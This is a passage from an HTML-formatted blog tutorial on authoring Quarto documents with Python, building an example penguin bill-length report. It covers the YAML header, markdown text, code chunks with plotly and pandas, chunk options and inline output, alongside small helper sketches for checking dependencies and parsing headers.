&lt;/ul&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;quarto preview &amp;lt;your-doc&amp;gt;.qmd
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;To convert the document from .qmd into the desired output format:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;quarto render &amp;lt;your-doc&amp;gt;.qmd
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="preparing-a-document"&gt;Preparing a document&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s use Quarto to write an html &lt;a href="https://jumpingrivers.github.io/blog/quarto_python_penguins_report.html" rel="external"&gt;web report&lt;/a&gt; about penguins! 🐧&lt;/p&gt;
&lt;p&gt;If you wish to run the code yourself you will need the following dependencies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/getting_started.html" rel="external"&gt;pandas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://plotly.com/python/getting-started/" rel="external"&gt;plotly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.statsmodels.org/dev/install.html" rel="external"&gt;statsmodels&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
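&lt;p&gt;If you are unsure which of these are already present in your environment, a quick check along the following lines may help. The helper &lt;code&gt;missing_packages()&lt;/code&gt; is a hypothetical name introduced for this sketch; it only tests whether each package can be found, not which version is installed.&lt;/p&gt;

```python
from importlib.util import find_spec


def missing_packages(names):
    """Return the names that cannot be found in the current Python environment."""
    return [name for name in names if find_spec(name) is None]


missing = missing_packages(["pandas", "plotly", "statsmodels"])
if missing:
    print("Not installed:", ", ".join(missing))
else:
    print("All dependencies are available")
```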
&lt;p&gt;These can be installed with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python3 -m pip install pandas plotly statsmodels
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="1-yaml-header"&gt;1) YAML header&lt;/h4&gt;
&lt;p&gt;To start, we&amp;rsquo;ll need a YAML header.&lt;/p&gt;
&lt;p&gt;YAML is a human-readable language often used to write configuration files. In
Quarto, it&amp;rsquo;s used to configure the settings for the presentation and formatting
of the documents.&lt;/p&gt;
&lt;p&gt;The header is fenced above and below by three hyphens (&lt;code&gt;---&lt;/code&gt;). The example below
includes some common settings:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Reporting on the bill length of penguins&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;author&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Myles Mitchell &amp;amp; Parisa Gregg&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;date&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;14 December 2022&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;html&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;jupyter&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;python3&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;The first three should be self-explanatory!&lt;/li&gt;
&lt;li&gt;&lt;code&gt;format&lt;/code&gt; sets the preferred output format for your document (html, pdf, docx,
&amp;hellip;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;jupyter&lt;/code&gt; sets the kernel for executing embedded Python code&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You don&amp;rsquo;t have to specify a Jupyter kernel if the first code chunk is in Python;
in that case, Quarto will know to use Jupyter (although you may still wish to
select a specific kernel).&lt;/p&gt;
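&lt;p&gt;To make the structure of the header concrete, here is a small sketch that splits a document into its fenced header and its body, then reads the flat &lt;code&gt;key: value&lt;/code&gt; settings. This is not how Quarto itself parses the header: both functions are hypothetical helpers written for this example, and they deliberately ignore nested YAML, for which a proper YAML parser would be needed.&lt;/p&gt;

```python
def split_front_matter(text):
    """Split a .qmd string into (header_lines, body) using the --- fences."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "---":
        return [], text
    for i in range(1, len(lines)):
        if lines[i].strip() == "---":
            return lines[1:i], "\n".join(lines[i + 1:])
    return [], text  # no closing fence: treat everything as body


def parse_simple_header(header_lines):
    """Parse flat `key: value` lines only; nested YAML is out of scope here."""
    settings = {}
    for line in header_lines:
        key, sep, value = line.partition(":")
        if sep:
            settings[key.strip()] = value.strip().strip('"')
    return settings


doc = '''---
title: "Reporting on the bill length of penguins"
format: html
jupyter: python3
---

## Abstract
'''

header, body = split_front_matter(doc)
settings = parse_simple_header(header)
print(settings["format"], settings["jupyter"])
```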
&lt;h4 id="2-markdown-text"&gt;2) Markdown text&lt;/h4&gt;
&lt;p&gt;The main body of text is written in markdown syntax. If you haven&amp;rsquo;t used
markdown before, it&amp;rsquo;s an easy-to-learn language that allows you to combine plain
text and blocks of code.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll say a bit more about Python code chunks below, but for a quick guide to
markdown basics, the
&lt;a href="https://quarto.org/docs/authoring/markdown-basics.html" rel="external"&gt;Quarto documentation&lt;/a&gt;
is a great place to start!&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s an opening passage for our report, written in markdown:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Abstract
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Prepare yourself for a life-changing article about penguins...
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Introduction
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Penguins&lt;/span&gt;](https://en.wikipedia.org/wiki/Penguin) are a family
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(**Spheniscidae**) of aquatic flightless
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;birds&lt;/span&gt;](https://en.wikipedia.org/wiki/Bird) that live primarily in the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Southern Hemisphere&lt;/span&gt;](https://en.wikipedia.org/wiki/Southern_Hemisphere).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Their diet consists of:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Krill
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Squid
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; More fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;There are 18 species of penguin, including:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;1.&lt;/span&gt; Macaroni penguin (*Eudyptes chrysolophus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;2.&lt;/span&gt; Chinstrap penguin (*Pygoscelis antarcticus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;3.&lt;/span&gt; Gentoo penguin (*Pygoscelis papua*)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We&amp;rsquo;ve included hyperlinks, bullet points, numbered lists, bold and italic font
using the asterisk symbol, and subheadings using the hash symbol.&lt;/p&gt;
&lt;p&gt;The screenshot below shows the rendered output so far:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the title, abstract and introduction in our rendered html output." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/intro_screenshot.png" width="1254"&gt;&lt;/p&gt;
&lt;h4 id="3-code-chunks"&gt;3) Code chunks&lt;/h4&gt;
&lt;p&gt;We can use code chunks to insert code into the document. These are fenced off
by three backticks (```). To specify the language we can include &lt;code&gt;{python}&lt;/code&gt;
after the first set of backticks.&lt;/p&gt;
&lt;p&gt;The Python code is not just for show! It can also be used to dynamically
generate content including figures and tables. Let&amp;rsquo;s use some Python code to
include a plot in our document. We&amp;rsquo;ll start by loading in some data using
pandas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import pandas as pd
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data = pd.read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2020/2020-07-28/penguins.csv&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data.head()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first five rows of the &lt;code&gt;DataFrame&lt;/code&gt; will be displayed by &lt;code&gt;data.head()&lt;/code&gt; in
the rendered document, along with the code used to load in the data:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the table in our rendered html output, along with the code used to generate it." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/table_screenshot.png" width="1209"&gt;&lt;/p&gt;
&lt;p&gt;Now let&amp;rsquo;s make a plot. Because we&amp;rsquo;re creating a web document, let&amp;rsquo;s generate an
interactive figure using the plotly library:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-cap: &amp;#34;Bill length as a function of body mass&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-width: 8
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import plotly.express as px
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;px.scatter(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; data,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; x=&amp;#34;body_mass_g&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; y=&amp;#34;bill_length_mm&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; color=&amp;#34;species&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; facet_col=&amp;#34;year&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; trendline=&amp;#34;ols&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;YAML code chunk options can be provided at the top of a code block, and are
prefixed with &lt;code&gt;#|&lt;/code&gt; followed by a space. Here we have used three options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Setting &lt;code&gt;echo&lt;/code&gt; to &lt;code&gt;false&lt;/code&gt; hides the code chunk in the rendered document&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig-cap&lt;/code&gt; adds a figure caption&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig-width&lt;/code&gt; controls the figure width&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Some other common options include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;eval&lt;/code&gt;: if &lt;code&gt;false&lt;/code&gt;, the code will not be evaluated&lt;/li&gt;
&lt;li&gt;&lt;code&gt;warning&lt;/code&gt;: if &lt;code&gt;false&lt;/code&gt;, warning messages will be hidden&lt;/li&gt;
&lt;li&gt;&lt;code&gt;error&lt;/code&gt;: if &lt;code&gt;true&lt;/code&gt;, the code is allowed to error and the error message will
be displayed in the output&lt;/li&gt;
&lt;/ul&gt;
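&lt;p&gt;The &lt;code&gt;#|&lt;/code&gt; convention is simple enough to illustrate in a few lines of Python. The sketch below collects the option lines at the top of a chunk into a dictionary. The function &lt;code&gt;parse_chunk_options()&lt;/code&gt; is a hypothetical helper, not part of Quarto, and it keeps every value as a plain string instead of interpreting it as YAML.&lt;/p&gt;

```python
def parse_chunk_options(chunk_source):
    """Collect the leading `#| key: value` lines of a code chunk into a dict."""
    options = {}
    for line in chunk_source.splitlines():
        if not line.startswith("#| "):
            break  # options must sit at the top of the chunk
        key, sep, value = line[3:].partition(":")
        if sep:
            options[key.strip()] = value.strip().strip('"')
    return options


chunk = '''#| echo: false
#| fig-cap: "Bill length as a function of body mass"
#| fig-width: 8
import plotly.express as px
'''

options = parse_chunk_options(chunk)
print(options)
```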
&lt;h4 id="4-inline-ish-code"&gt;4) Inline-ish code&lt;/h4&gt;
&lt;p&gt;To insert code inline, just use a pair of backticks:
&lt;code&gt;`data = pd.read_csv(penguins_url)`&lt;/code&gt;. Additionally, if you want the code to
have Python formatting you can use &lt;code&gt;`data = pd.read_csv(penguins_url)`{.python}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;You may also wish to &lt;em&gt;execute&lt;/em&gt; code inline. Unfortunately, at the time of writing there isn&amp;rsquo;t a tidy
way to execute Python code inline as you can with the R language.
However, there is a workaround: generate the markdown inside a Python code
block, inserting any values that need to be computed by Python into the
generated text.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s demonstrate this by adding a sentence stating the average bill
length:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;from IPython.display import display, Markdown
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;avg_length = data[&amp;#39;bill_length_mm&amp;#39;].mean()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;display(Markdown(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;f&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;According to our data, the average bill length is
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;{round(avg_length, 1)} mm.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have made use of an f-string to insert a Python variable (rounded to one
decimal place) in the sentence. The &lt;code&gt;Markdown()&lt;/code&gt; function is used to convert
the string into markdown, and this is displayed in the rendered document using
&lt;code&gt;display()&lt;/code&gt;. If our data changes, we just need to re-render the document and
this text will be updated automatically!&lt;/p&gt;
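&lt;p&gt;The string-building step can be tried on its own, without pandas or IPython. The sketch below uses a hypothetical helper, &lt;code&gt;bill_length_sentence()&lt;/code&gt;, and a handful of made-up values; missing measurements are represented by &lt;code&gt;None&lt;/code&gt; and skipped before averaging.&lt;/p&gt;

```python
from statistics import mean


def bill_length_sentence(lengths_mm):
    """Build the markdown sentence from a list of bill lengths (None = missing)."""
    observed = [x for x in lengths_mm if x is not None]
    avg_length = mean(observed)
    return (
        "According to our data, the average bill length is "
        f"{round(avg_length, 1)} mm."
    )


# Made-up sample values, not taken from the penguins dataset
sentence = bill_length_sentence([39.1, None, 40.3, 39.5])
print(sentence)
```

&lt;p&gt;Inside a Quarto code chunk, the returned string could then be passed to &lt;code&gt;Markdown()&lt;/code&gt; and &lt;code&gt;display()&lt;/code&gt; exactly as in the chunk above.&lt;/p&gt;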
&lt;p&gt;The screenshot below shows this sentence (along with our plot) in the rendered document:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the plot in our rendered html output, along with the sentence containing executed inline code." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/plot_screenshot.png" width="1136"&gt;&lt;/p&gt;
&lt;h3 id="wrapping-up"&gt;Wrapping up&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s put all of this together and apply some finishing touches:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;title: &amp;#34;Reporting on the bill length of penguins&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;author: &amp;#34;Myles Mitchell &amp;amp; Parisa Gregg&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date: &amp;#34;14 December 2022&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;format: html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jupyter: python3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Abstract
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Prepare yourself for a life-changing article about penguins...
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Introduction
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Penguins&lt;/span&gt;](https://en.wikipedia.org/wiki/Penguin) are a family
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(**Spheniscidae**) of aquatic flightless
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;birds&lt;/span&gt;](https://en.wikipedia.org/wiki/Bird) that live primarily in the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Southern Hemisphere&lt;/span&gt;](https://en.wikipedia.org/wiki/Southern_Hemisphere).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Their diet consists of:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Krill
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Squid
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; More fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;There are 18 species of penguin, including:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;1.&lt;/span&gt; Macaroni penguin (*Eudyptes chrysolophus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;2.&lt;/span&gt; Chinstrap penguin (*Pygoscelis antarcticus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;3.&lt;/span&gt; Gentoo penguin (*Pygoscelis papua*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Methods
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;To determine whether a higher body mass implies a longer bill, we loaded a
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins dataset using pandas:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import pandas as pd
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
